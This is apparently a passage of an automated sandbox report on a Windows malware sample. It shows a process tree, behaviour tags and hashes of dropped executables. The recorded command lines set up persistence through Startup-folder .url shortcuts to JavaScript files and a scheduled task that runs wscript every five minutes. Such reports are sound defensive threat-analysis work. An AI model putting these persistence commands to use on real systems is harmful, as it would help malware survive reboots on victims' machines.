                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:876
              • C:\Windows\SysWOW64\cmd.exe
                cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
                2⤵
                • Drops startup file
                • System Location Discovery: System Language Discovery
                PID:3008
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1668
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2044
              • C:\Windows\SysWOW64\cmd.exe
                cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                2⤵
                • Drops startup file
                • System Location Discovery: System Language Discovery
                PID:2240
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {BFC21C78-FBF1-4301-AE56-0E242F63A1C2} S-1-5-21-677481364-2238709445-1347953534-1000:JXXXDSWS\Admin:Interactive:[1]
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:984
              • C:\ProgramData\WMIsys\CONAtdrive.exe
                C:\ProgramData\WMIsys\CONAtdrive.exe
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1692
              • C:\ProgramData\WMIsys\CONAtdrive.exe
                C:\ProgramData\WMIsys\CONAtdrive.exe
                2⤵
                PID:2220

                                    Downloads

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      71KB

                                      MD5

                                      83142242e97b8953c386f988aa694e4a

                                      SHA1

                                      833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                      SHA256

                                      d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                      SHA512

                                      bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z504R1Z\soft[1]

                                      Filesize

                                      987KB

                                      MD5

                                      f49d1aaae28b92052e997480c504aa3b

                                      SHA1

                                      a422f6403847405cee6068f3394bb151d8591fb5

                                      SHA256

                                      81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

                                      SHA512

                                      41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ZQSKFIX\service[1].htm

                                      Filesize

                                      1B

                                      MD5

                                      cfcd208495d565ef66e7dff9f98764da

                                      SHA1

                                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                      SHA256

                                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                      SHA512

                                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                    • C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe

                                      Filesize

                                      262KB

                                      MD5

                                      36105cc7aff011ef834f9e83717f9ab1

                                      SHA1

                                      9b5a1a9da2f1e22ae23517c45b82c734a5793ded

                                      SHA256

                                      36263b9d2418efa92ba637974cfed268437354d88be78814354c5d47337890c2

                                      SHA512

                                      38662724ed70d768ff19ed260f17593a956858ee5aedd4d4178f895bf3ca39181983d8310acc6aa203223518fa7394e64829832b380121a86360120aab66ba50

                                    • C:\Users\Admin\AppData\Local\Temp\10142170101\4189e09c15.exe

                                      Filesize

                                      2.9MB

                                      MD5

                                      f60c4315a77f0a2f050c3e60d7fbe975

                                      SHA1

                                      d577a187304ace9ba700e13f9dd66e851efaffef

                                      SHA256

                                      31b7a2eee7649ee4c871b556a23022a126092ba8bc3b07d2fe28f6cafa6ffcfd

                                      SHA512

                                      ff7e726e1bf4955c1237ece1ecbbecd194d626474daad0536b21ca27efbd950b2816ac25b22c2b57cf6798c4eabd03ffbca45b1f0208544181d974553649b11e

                                    • C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe

                                      Filesize

                                      1.7MB

                                      MD5

                                      c70ba9b3fc03b137ac57e9f9eb7f669b

                                      SHA1

                                      188d35cc8f3e888aacd4a03aaac5979fa7680b01

                                      SHA256

                                      d7c6199beb7718942d7fa14f3bebdae21a1142d7ccdbf4486f79c04228a873b7

                                      SHA512

                                      30efb384601044f0de192d3ae6de6d90e2dc6d260cabaf35ad27c74d3181ddf3de7e47d0c0778cbc7ec00a5fabdd2a804889357353511fe6c8200267f2a3e585

                                    • C:\Users\Admin\AppData\Local\Temp\10142200101\2cd9a90288.exe

                                      Filesize

                                      3.8MB

                                      MD5

                                      c9e0574f5278149157f8cd14ad266886

                                      SHA1

                                      3b1671a65d6ed7beda7001eaf7b239bf153012cd

                                      SHA256

                                      98ffb7534eb707b6d086ff3c049a424d19256056c43e09945097dae5538a7eb9

                                      SHA512

                                      ec409f1f3b4484574697877c56253e19f2f0c189b8ba0a1cd3e64e1dedc7876cf3a604f0d2496bedfaf20ca1c115055431cd6f7e443189b4ff2a1fb67f32289a

                                    • C:\Users\Admin\AppData\Local\Temp\10142210101\0102b962a1.exe

                                      Filesize

                                      1.8MB

                                      MD5

                                      3a684b497af86498fe2f8dc4c392cc51

                                      SHA1

                                      ad86b1d97c75406c52864b02eb981e6511ac835e

                                      SHA256

                                      f832a90b90aed49ea52fabccce43ef1db001f732a01705346503581a6dd68dd8

                                      SHA512

                                      ca4a6558fc0e8996beaaabd809b2978c4f26148adf796031948fc472ac7c49d755c331d5698b0037832fc132e8d620a926a1c20631d2d47af610904bf7f3290c

                                    • C:\Users\Admin\AppData\Local\Temp\10142220101\516d293752.exe

                                      Filesize

                                      4.5MB

                                      MD5

                                      16bcdf9f515993aa3f2e6e33fd867768

                                      SHA1

                                      750d69459a107b7fc45a2073895a51f0d211415d

                                      SHA256

                                      873565936ff2ecf66e4efc7c211f555589deea3b94474e65fc5c9ca712a61d3e

                                      SHA512

                                      9bca85e004363ac6a554c1120e02f82f4af4cc8c439a40166883eb0c290d636087a3f31200d25bfaff14351e9d0593d7f7d9725f82d7037e4ca47f920347b430

                                    • C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe

                                      Filesize

                                      364KB

                                      MD5

                                      9dd7f35baa732ab9c19737f7574f5198

                                      SHA1

                                      af2f9db558e5c979839af7fc54a9c6f4c5f1945c

                                      SHA256

                                      ebf04432efd04f6cef2c51164bb25c78867f0c8f7e361653408f74e7b5e1f2f6

                                      SHA512

                                      ee2d9b78696a6fcbb018ea46a8125edea4d3df76c604290d8ecc6586e9dbf15e8d14e09fdcb124fc235d47d1736e9995ec7501d101541a091b3d208efa695e91

                                    • C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe

                                      Filesize

                                      159KB

                                      MD5

                                      36beea554789233179f8275b85035d42

                                      SHA1

                                      f4bd79044a32adb1b678aaec13eda99d9f169215

                                      SHA256

                                      df5311f9bb283913fd5295202df47050893b8ed4f29b1801e1720f5443e87163

                                      SHA512

                                      f8868aa5609787a5222d393848ee8fdb2551691470c6f0e0f30242660c048f6ed7306aa4c46c6b0f359800b422c056fbb1f66fe750effd3a7c47fff7394de49d

                                    • C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe

                                      Filesize

                                      1.3MB

                                      MD5

                                      81791c3bf6c8d01341e77960eafc2636

                                      SHA1

                                      3a9e164448717ced3d66354f17d3bcba9689c297

                                      SHA256

                                      c1bfa0e9313ea896eba6329eb52b70374df276493468ca30d633f825f91f52a0

                                      SHA512

                                      0629a854e68e3742448447d732a6eb21bcf47dd451552f9699d227fed2733c54a508e4fbfd647c11bee2b5f031bbda0e9f16b5af84c800598a1fe72368aa2f47

                                    • C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe

                                      Filesize

                                      2.0MB

                                    • C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe

                                      Filesize

                                      3.5MB

                                    • C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe

                                      Filesize

                                      429KB

                                    • C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe

                                      Filesize

                                      350KB

                                    • C:\Users\Admin\AppData\Local\Temp\10142360101\3df5e5788d.exe

                                      Filesize

                                      3.1MB

                                    • C:\Users\Admin\AppData\Local\Temp\10142370101\75c1ef65a5.exe

                                      Filesize

                                      1.7MB

                                    • C:\Users\Admin\AppData\Local\Temp\10142380101\775a1069e0.exe

                                      Filesize

                                      948KB

                                    • C:\Users\Admin\AppData\Local\Temp\10142390101\b71d0f89d2.exe

                                      Filesize

                                      2.7MB

                                    • C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe

                                      Filesize

                                      107KB

                                    • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe

                                      Filesize

                                      63KB

                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs

                                      Filesize

                                      15KB

                                    • C:\Users\Admin\AppData\Local\Temp\TarAC7C.tmp

                                      Filesize

                                      183KB

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                      Filesize

                                      7KB

                                    • \Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

                                      Filesize

                                      1.8MB
